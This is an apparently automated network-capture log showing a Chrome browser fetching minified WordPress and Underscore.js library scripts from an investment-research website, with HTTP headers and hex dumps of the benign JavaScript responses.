                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 63 6e 28 6e 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3d 74 28 6e 29 3b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 30 3c 3d 6e 26 26 6e 3c 3d 47 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 5b 74 5d 7d 7d 76 61 72 20 64 3d 73 6e 28 22 62 79 74 65 4c 65 6e 67 74 68 22 29 2c 70 6e 3d 6c 6e 28 64 29 2c 68 6e 3d 2f 5c 5b 6f 62 6a 65 63 74 20 28 28 49 7c 55 69 29 6e 74 28 38 7c 31 36 7c 33 32 29 7c 46 6c 6f 61 74 28 33 32 7c 36 34 29 7c 55 69 6e
                                                                                                                                                                                                                                                                        Data Ascii: cn(n){return function(){return n}}function ln(t){return function(n){n=t(n);return"number"==typeof n&&0<=n&&n<=G}}function sn(t){return function(n){return null==n?void 0:n[t]}}var d=sn("byteLength"),pn=ln(d),hn=/\[object ((I|Ui)nt(8|16|32)|Float(32|64)|Uin
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 2f 6e 3d 3d 31 2f 74 3a 6e 75 6c 6c 21 3d 6e 26 26 6e 75 6c 6c 21 3d 74 26 26 28 6e 21 3d 6e 3f 74 21 3d 74 3a 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 28 75 3d 74 79 70 65 6f 66 20 6e 29 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 75 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 29 26 26 66 75 6e 63 74 69 6f 6e 20 6e 28 74 2c 72 2c 65 2c 75 29 7b 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 6d 26 26 28 74 3d 74 2e 5f 77 72 61 70 70 65 64 29 3b 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 6d 26 26 28 72 3d 72 2e 5f 77 72 61 70 70 65 64 29 3b 76 61 72 20 6f 3d 73 2e 63 61 6c 6c 28 74 29 3b 69 66 28 6f 21 3d 3d 73 2e 63 61 6c 6c 28 72 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 75 6e 26 26 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3d 3d 6f 26 26 68 28 74 29
                                                                                                                                                                                                                                                                        Data Ascii: /n==1/t:null!=n&&null!=t&&(n!=n?t!=t:("function"==(u=typeof n)||"object"==u||"object"==typeof t)&&function n(t,r,e,u){t instanceof m&&(t=t._wrapped);r instanceof m&&(r=r._wrapped);var o=s.call(t);if(o!==s.call(r))return!1;if(un&&"[object Object]"==o&&h(t)
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 6e 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 63 28 6e 29 3b 69 66 28 67 28 74 29 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 75 3b 72 2b 2b 29 69 66 28 21 70 28 6e 5b 65 5b 72 5d 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 65 21 3d 3d 5f 6e 7c 7c 21 70 28 6e 5b 77 6e 5d 29 7d 7d 76 61 72 20 77 6e 3d 22 66 6f 72 45 61 63 68 22 2c 74 3d 5b 22 63 6c 65 61 72 22 2c 22 64 65 6c 65 74 65 22 5d 2c 75 3d 5b 22 67 65 74 22 2c 22 68 61 73 22 2c 22 73 65 74 22 5d 2c 55 3d 74 2e 63 6f 6e 63 61 74 28 77 6e 2c 75 29 2c 5f 6e 3d 74 2e 63 6f 6e 63 61 74 28 75 29 2c 72 3d 5b 22 61 64 64 22 5d 2e 63 6f 6e 63 61 74 28 74 2c 77 6e 2c 22 68 61 73 22 29 2c 75 3d
                                                                                                                                                                                                                                                                        Data Ascii: n function(n){if(null==n)return!1;var t=c(n);if(g(t))return!1;for(var r=0;r<u;r++)if(!p(n[e[r]]))return!1;return e!==_n||!p(n[wn])}}var wn="forEach",t=["clear","delete"],u=["get","has","set"],U=t.concat(wn,u),_n=t.concat(u),r=["add"].concat(t,wn,"has"),u=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 63 61 6c 6c 28 6f 2c 6e 29 7d 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 75 2e 63 61 6c 6c 28 6f 2c 6e 2c 74 2c 72 29 7d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 2c 65 29 7b 72 65 74 75 72 6e 20 75 2e 63 61 6c 6c 28 6f 2c 6e 2c 74 2c 72 2c 65 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 2e 61 70 70 6c 79 28 6f 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 44 6e 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 3f 54 6e 3a 70 28 6e 29 3f 78 28 6e 2c 74 2c 72 29 3a 28 6f 28 6e 29 26 26 21 76 28 6e 29 3f 41 3a 6b 6e 29 28 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 52 6e 28
                                                                                                                                                                                                                                                                        Data Ascii: call(o,n)};case 3:return function(n,t,r){return u.call(o,n,t,r)};case 4:return function(n,t,r,e){return u.call(o,n,t,r,e)}}return function(){return u.apply(o,arguments)}}function Dn(n,t,r){return null==n?Tn:p(n)?x(n,t,r):(o(n)&&!v(n)?A:kn)(n)}function Rn(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 73 2c 72 29 7d 76 61 72 20 61 3d 4d 2e 70 6c 61 63 65 68 6f 6c 64 65 72 3b 72 65 74 75 72 6e 20 69 7d 29 2c 47 6e 3d 28 4d 2e 70 6c 61 63 65 68 6f 6c 64 65 72 3d 6d 2c 6c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 29 7b 76 61 72 20 75 3b 69 66 28 70 28 74 29 29 72 65 74 75 72 6e 20 75 3d 6c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4a 6e 28 74 2c 75 2c 72 2c 74 68 69 73 2c 65 2e 63 6f 6e 63 61 74 28 6e 29 29 7d 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 42 69 6e 64 20 6d 75 73 74 20 62 65 20 63 61 6c 6c 65 64 20 6f 6e 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 29 29 2c 45 3d 6c 6e 28 67 29 3b 66 75 6e 63 74 69 6f 6e 20 42 28 6e 2c 74 2c 72 2c 65 29 7b 69 66 28 65 3d 65 7c 7c 5b 5d 2c 74 7c 7c 30 3d 3d 3d 74 29
                                                                                                                                                                                                                                                                        Data Ascii: s,r)}var a=M.placeholder;return i}),Gn=(M.placeholder=m,l(function(t,r,e){var u;if(p(t))return u=l(function(n){return Jn(t,u,r,this,e.concat(n))});throw new TypeError("Bind must be called on a function")})),E=ln(g);function B(n,t,r,e){if(e=e||[],t||0===t)
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 61 74 68 2e 6d 61 78 28 72 2b 75 2c 65 29 3a 75 3d 30 3c 3d 72 3f 4d 61 74 68 2e 6d 69 6e 28 72 2b 31 2c 75 29 3a 72 2b 75 2b 31 3b 65 6c 73 65 20 69 66 28 61 26 26 72 26 26 75 29 72 65 74 75 72 6e 20 6e 5b 72 3d 61 28 6e 2c 74 29 5d 3d 3d 3d 74 3f 72 3a 2d 31 3b 69 66 28 74 21 3d 74 29 72 65 74 75 72 6e 20 30 3c 3d 28 72 3d 69 28 66 2e 63 61 6c 6c 28 6e 2c 65 2c 75 29 2c 66 6e 29 29 3f 72 2b 65 3a 2d 31 3b 66 6f 72 28 72 3d 30 3c 6f 3f 65 3a 75 2d 31 3b 30 3c 3d 72 26 26 72 3c 75 3b 72 2b 3d 6f 29 69 66 28 6e 5b 72 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 72 3b 72 65 74 75 72 6e 2d 31 7d 7d 76 61 72 20 61 74 3d 69 74 28 31 2c 65 74 2c 6f 74 29 2c 66 74 3d 69 74 28 2d 31 2c 75 74 29 3b 66 75 6e 63 74 69 6f 6e 20 63 74 28 6e 2c 74 2c 72 29 7b 74 3d 28 45 28
                                                                                                                                                                                                                                                                        Data Ascii: ath.max(r+u,e):u=0<=r?Math.min(r+1,u):r+u+1;else if(a&&r&&u)return n[r=a(n,t)]===t?r:-1;if(t!=t)return 0<=(r=i(f.call(n,e,u),fn))?r+e:-1;for(r=0<o?e:u-1;0<=r&&r<u;r+=o)if(n[r]===t)return r;return-1}}var at=it(1,et,ot),ft=it(-1,ut);function ct(n,t,r){t=(E(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 28 6e 3d 75 26 26 75 2e 6c 65 6e 67 74 68 3f 4e 6e 28 6e 2c 75 29 3a 6e 29 29 72 65 74 75 72 6e 3b 74 3d 6e 5b 72 5d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 74 3a 74 2e 61 70 70 6c 79 28 6e 2c 65 29 7d 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 64 74 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 49 28 6e 2c 6b 6e 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 6e 2c 65 2c 74 29 7b 76 61 72 20 72 2c 75 2c 6f 3d 2d 31 2f 30 2c 69 3d 2d 31 2f 30 3b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 6e 5b 30 5d 26 26 6e 75 6c 6c 21 3d 6e 29 66 6f 72 28 76 61 72 20 61 3d 30 2c 66 3d 28 6e 3d 45 28 6e 29 3f 6e 3a 6a 28 6e 29 29 2e 6c 65 6e 67 74 68 3b 61 3c 66 3b 61
                                                                                                                                                                                                                                                                        Data Ascii: (n=u&&u.length?Nn(n,u):n))return;t=n[r]}return null==t?t:t.apply(n,e)})});function dt(n,t){return I(n,kn(t))}function gt(n,e,t){var r,u,o=-1/0,i=-1/0;if(null==e||"number"==typeof e&&"object"!=typeof n[0]&&null!=n)for(var a=0,f=(n=E(n)?n:j(n)).length;a<f;a
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 74 29 7b 72 65 74 75 72 6e 21 6b 28 72 2c 74 29 7d 29 2c 4f 74 28 6e 2c 65 2c 74 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 45 74 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 6e 2c 30 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 6e 2e 6c 65 6e 67 74 68 2d 28 6e 75 6c 6c 3d 3d 74 7c 7c 72 3f 31 3a 74 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 2e 6c 65 6e 67 74 68 3c 31 3f 6e 75 6c 6c 3d 3d 74 7c 7c 72 3f 76 6f 69 64 20 30 3a 5b 5d 3a 6e 75 6c 6c 3d 3d 74 7c 7c 72 3f 6e 5b 30 5d 3a 45 74 28 6e 2c 6e 2e 6c 65 6e 67 74 68 2d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 6e 2c 6e 75 6c 6c 3d 3d 74 7c 7c 72 3f 31 3a 74
                                                                                                                                                                                                                                                                        Data Ascii: t){return!k(r,t)}),Ot(n,e,t)});function Et(n,t,r){return f.call(n,0,Math.max(0,n.length-(null==t||r?1:t)))}function Bt(n,t,r){return null==n||n.length<1?null==t||r?void 0:[]:null==t||r?n[0]:Et(n,n.length-t)}function R(n,t,r){return f.call(n,null==t||r?1:t


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        41192.168.2.449795141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC566OUTGET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67354354-12a8"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9ddee30426a-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC877INData Raw: 31 32 61 38 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62
                                                                                                                                                                                                                                                                        Data Ascii: 12a8/*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symb
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 61 6d 65 73 70 61 63 65 20 6d 75 73 74 20 62 65 20 61 20 6e 6f 6e 2d 65 6d 70 74 79 20 73 74 72 69 6e 67 2e 22 29 2c 21 31 29 3a 21 21 2f 5e 5b 61 2d 7a 41 2d 5a 5d 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2e 5c 2d 5c 2f 5d 2a 24 2f 2e 74 65 73 74 28 74 29 7c 7c 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 6e 61 6d 65 73 70 61 63 65 20 63 61 6e 20 6f 6e 6c 79 20 63 6f 6e 74 61 69 6e 20 6e 75 6d 62 65 72 73 2c 20 6c 65 74 74 65 72 73 2c 20 64 61 73 68 65 73 2c 20 70 65 72 69 6f 64 73 2c 20 75 6e 64 65 72 73 63 6f 72 65 73 20 61 6e 64 20 73 6c 61 73 68 65 73 2e 22 29 2c 21 31 29 7d 3b 63 6f 6e 73 74 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 22 22 3d 3d 3d 74 3f 28 63 6f
                                                                                                                                                                                                                                                                        Data Ascii: amespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)};const r=function(t){return"string"!=typeof t||""===t?(co
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 65 6e 67 74 68 2d 31 3b 65 3e 3d 30 3b 65 2d 2d 29 74 5b 65 5d 2e 6e 61 6d 65 73 70 61 63 65 3d 3d 3d 73 26 26 28 74 2e 73 70 6c 69 63 65 28 65 2c 31 29 2c 6c 2b 2b 2c 63 2e 5f 5f 63 75 72 72 65 6e 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6e 61 6d 65 3d 3d 3d 69 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 3e 3d 65 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2d 2d 7d 29 29 29 7d 72 65 74 75 72 6e 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 21 3d 3d 69 26 26 74 2e 64 6f 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 69 2c 73 29 2c 6c 7d 7d 3b 63 6f 6e 73 74 20 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 63 6f 6e 73 74 20 6f 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                        Data Ascii: ength-1;e>=0;e--)t[e].namespace===s&&(t.splice(e,1),l++,c.__current.forEach((t=>{t.name===i&&t.currentIndex>=e&&t.currentIndex--})))}return"hookRemoved"!==i&&t.doAction("hookRemoved",i,s),l}};const s=function(t,e){return function(n,r){const o=t[e];return
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1169INData Raw: 6f 72 28 29 7b 74 68 69 73 2e 61 63 74 69 6f 6e 73 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 74 68 69 73 2e 61 63 74 69 6f 6e 73 2e 5f 5f 63 75 72 72 65 6e 74 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 66 69 6c 74 65 72 73 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 74 68 69 73 2e 66 69 6c 74 65 72 73 2e 5f 5f 63 75 72 72 65 6e 74 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 61 64 64 41 63 74 69 6f 6e 3d 6f 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 61 64 64 46 69 6c 74 65 72 3d 6f 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 63 74 69 6f 6e 3d 69 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 46 69 6c 74 65 72 3d 69 28
                                                                                                                                                                                                                                                                        Data Ascii: or(){this.actions=Object.create(null),this.actions.__current=new Set,this.filters=Object.create(null),this.filters.__current=new Set,this.addAction=o(this,"actions"),this.addFilter=o(this,"filters"),this.removeAction=i(this,"actions"),this.removeFilter=i(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        42192.168.2.449799141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC789OUTGET /wp-includes/js/wp-util.min.js?ver=d4c9c51d21a0c26e910ec9a6a2b06883 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67354354-592"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9de287a4338-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC878INData Raw: 35 39 32 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 77 69 6e 64 6f 77 2e 77 70 3d 77 69 6e 64 6f 77 2e 77 70 7c 7c 7b 7d 2c 66 75 6e 63 74 69 6f 6e 28 73 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 3f 7b 7d 3a 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 3b 77 70 2e 74 65 6d 70 6c 61 74 65 3d 5f 2e 6d 65 6d 6f 69 7a 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 61 3d 7b 65 76 61 6c 75 61 74 65 3a 2f 3c 23 28 5b 5c 73 5c 53 5d 2b 3f 29 23 3e 2f 67 2c 69 6e 74 65 72 70 6f 6c 61 74 65 3a 2f 5c 7b 5c 7b 5c 7b 28 5b 5c 73 5c 53 5d 2b 3f 29 5c 7d 5c 7d 5c 7d 2f 67 2c 65 73 63 61 70 65 3a 2f 5c 7b
                                                                                                                                                                                                                                                                        Data Ascii: 592/*! This file is auto-generated */window.wp=window.wp||{},function(s){var t="undefined"==typeof _wpUtilSettings?{}:_wpUtilSettings;wp.template=_.memoize(function(e){var n,a={evaluate:/<#([\s\S]+?)#>/g,interpolate:/\{\{\{([\s\S]+?)\}\}\}/g,escape:/\{
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC555INData Raw: 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 22 31 22 21 3d 3d 74 26 26 31 21 3d 3d 74 7c 7c 28 74 3d 7b 73 75 63 63 65 73 73 3a 21 30 7d 29 2c 5f 2e 69 73 4f 62 6a 65 63 74 28 74 29 26 26 21 5f 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 2e 73 75 63 63 65 73 73 29 3f 28 65 3d 74 68 69 73 2c 6e 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 26 26 61 2e 64 61 74 61 26 26 22 71 75 65 72 79 2d 61 74 74 61 63 68 6d 65 6e 74 73 22 3d 3d 3d 61 2e 64 61 74 61 2e 61 63 74 69 6f 6e 26 26 6e 2e 6a 71 58 48 52 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 67 65 74 52 65 73 70 6f 6e 73 65 48 65 61 64 65 72 22 29 26 26 6e 2e 6a 71 58 48 52 2e 67 65 74 52 65 73 70 6f 6e 73 65 48 65 61 64 65 72 28 22 58 2d 57 50 2d 54 6f 74 61 6c 22
                                                                                                                                                                                                                                                                        Data Ascii: .done(function(t){var e;"1"!==t&&1!==t||(t={success:!0}),_.isObject(t)&&!_.isUndefined(t.success)?(e=this,n.done(function(){a&&a.data&&"query-attachments"===a.data.action&&n.jqXHR.hasOwnProperty("getResponseHeader")&&n.jqXHR.getResponseHeader("X-WP-Total"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        43192.168.2.449800141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC565OUTGET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
